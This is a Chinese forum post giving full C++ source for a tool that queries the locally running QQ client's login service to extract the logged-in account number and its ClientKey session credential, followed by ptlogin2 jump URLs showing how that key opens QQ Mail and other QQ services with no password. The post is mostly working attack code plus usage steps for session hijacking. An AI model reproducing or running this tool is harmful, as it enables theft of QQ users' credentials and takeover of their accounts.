-
-
[原创] 读取ClientKey的另一种思路,无需注入DLL
-
发表于: 2020-1-2 09:30
-
c++模拟会话登录,访问QQ的SSO,读取ClientKey,不需要注入
效果图:
需要注意的是,这种方法获取的clientkey长度是224位,和之前注入dll获取的不一样。
注入dll获取的是64位的clientkey
利用方法:
64字节: http://ptlogin2.qq.com/jump?ptlang=2052&clientuin=QQ号码&clientkey=64个字节的KEY&u1=需要登陆的QQ服务网站地址
224字节:
http://ptlogin2.qq.com/jump?clientuin=QQ号&clientkey=224位字节的KEY&keyindex=9&u1=需要登陆的QQ服务网站地址
例如,我想利用224字节的key,无密进入qq邮箱
用浏览器访问下面构造的地址,成功后会返回一个地址,复制再访问,就直接进入QQ邮箱了
http://ptlogin2.qq.com/jump?clientuin=QQ号&clientkey=224字节key&keyindex=9&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=25
源码:
#include "stdafx.h"
#include<string>
#include<windows.h>
#include<iostream>
#include <WinInet.h>
#pragma comment(lib,"wininet.lib")
using namespace std;
char URL_STRING[] = "https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http://www.qq.com/qq2012/loginSuccess.htm&style=20&border_radius=1&target=self&maskOpacity=40";
int _tmain(int argc, _TCHAR* argv[])
{
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char szHostName[128];
char szUrlPath[256];
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// 初始化会话
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
// 发送HTTP请求
HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
// 查询HTTP请求状态
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
BOOL bRet = FALSE;
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
// 读取整个Headers
char lpHeaderBuffer[1024] = {0};
dwSizeOfRq = 1024;
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 从Cookie中提取pt_local_token的值
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer)
{
if (strstr(pt_local_token, "pt_local_token="))
{
// 退出之前,修正偏移
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// 关闭句柄,只需要释放下面两个,注意关闭时按相反的顺序
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
/* 第二次建立会话 */
// 初始化URL参数
char lpszUrlPath[MAX_PATH] = "/pt_get_uins?callback=ptui_getuins_CB&pt_local_tk=";
strcat(lpszUrlPath, pt_local_token); // url末尾追加pt_local_token
// 初始化会话
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.qq.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
// 发送HTTP请求,添加头信息
char* lpHeaders = "Referer:https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http%3A%2F%2Fwww.qq.com%2Fqq2012%2FloginSuccess.htm";
HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
// 获取返回数据的大小
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
// 读取网页内容
char* lpBuffer = new char[dwNumberOfBytesAvailable]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
// 从内容中提取已登陆QQ账号,是个js数组,这里只提取第一个
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"account\":\""))
{
// 退出之前,修正偏移
uin += sizeof("\"account\":");
char* pEndBuffer = strstr(uin, "\"");
*pEndBuffer = 0;
break;
}
uin--;
}
cout << "[+] uin:" << uin << endl;
// 释放资源,注意关闭句柄时按相反的顺序
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
/* 第三次会话 */
// 初始化URL参数
ZeroMemory(lpszUrlPath,MAX_PATH);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&callback=ptui_getst_CB&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// 发送HTTPS请求
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.qq.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
// 添加头信息
lpHeaders = "Referer:https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http%3A%2F%2Fwww.qq.com%2Fqq2012%2FloginSuccess.htm";
HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 从Cookie中提取ClientKey的值
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
// 退出之前,修正偏移
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
cout << "[+] client key:" << clientkey << endl;
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
InternetCloseHandle(hInternet);
delete[] lpBuffer;
return 0;
}
最后于 2020-1-2 11:35
被Adventure编辑
,原因: 更新使用方法
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
